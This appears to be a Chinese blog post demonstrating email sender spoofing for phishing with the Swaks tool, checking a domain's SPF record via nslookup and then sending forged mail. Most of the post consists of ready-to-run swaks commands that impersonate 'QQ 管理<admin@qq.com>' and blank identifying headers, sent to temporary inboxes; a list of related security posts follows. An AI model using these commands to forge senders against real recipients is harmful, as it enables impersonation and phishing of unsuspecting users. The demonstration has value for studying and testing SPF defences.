邮件钓鱼--有无SPF演示--Swaks

目录

临时邮箱网址:

[Swaks 简单使用说明:(kali自带)](#Swaks 简单使用说明:(kali自带))

操作流程:

无SPF:(直接伪造发信人)

演示1

演示2

演示3

​编辑

有SPF:--演示


临时邮箱网址:

http://24mail.chacuo.net/

https://www.linshi-email.com/


Swaks 简单使用说明:(kali自带)

-t --to 目标地址 -t test@test.com

-f --from 来源地址 (发件人) -f "text<text@text.com>"

--protocol 设定协议(未测试)

--body "http://www.baidu.com" //引号中的内容即为邮件正文;

--header "Subject:hello" //邮件头信息,subject 为邮件标题

-ehlo 伪造邮件 ehlo 头

--data ./Desktop/email.txt //将 TXT 文件作为邮件发送;


操作流程:

1、检测:

nslookup -type=txt xxx.com

2、伪造:

swaks ...............


无SPF:(直接伪造发信人)

演示1

swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<admin@qq.com>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to qzmydusmoy@iubridge.com

---直接伪造发信人

演示2

swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<admin@qq.com>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to tripjf08516@chacuo.net

演示3

swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<admin@qq.com>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to uoysvj84956@027168.com

有SPF:--演示

swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to xxxxxxxxx9@163.com

相关推荐
星竹30 分钟前
upload-labs-master第21关超详细教程
网络安全
蜜獾云33 分钟前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
虹科数字化与AR1 小时前
安宝特应用 | 美国OSHA扩展Vuzix AR眼镜应用,强化劳动安全与效率
安全·ar·远程协助
Hacker_Fuchen2 小时前
天融信网络架构安全实践
网络·安全·架构
炫彩@之星2 小时前
Windows和Linux安全配置和加固
linux·windows·安全·系统安全配置和加固
凯子坚持 c4 小时前
深入Linux权限体系:守护系统安全的第一道防线
linux·运维·系统安全
独行soc10 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)
数据库·sql·安全·web安全·漏洞挖掘·hw
独行soc11 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
Clockwiseee12 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash13 小时前
安全算法基础(一)
算法·安全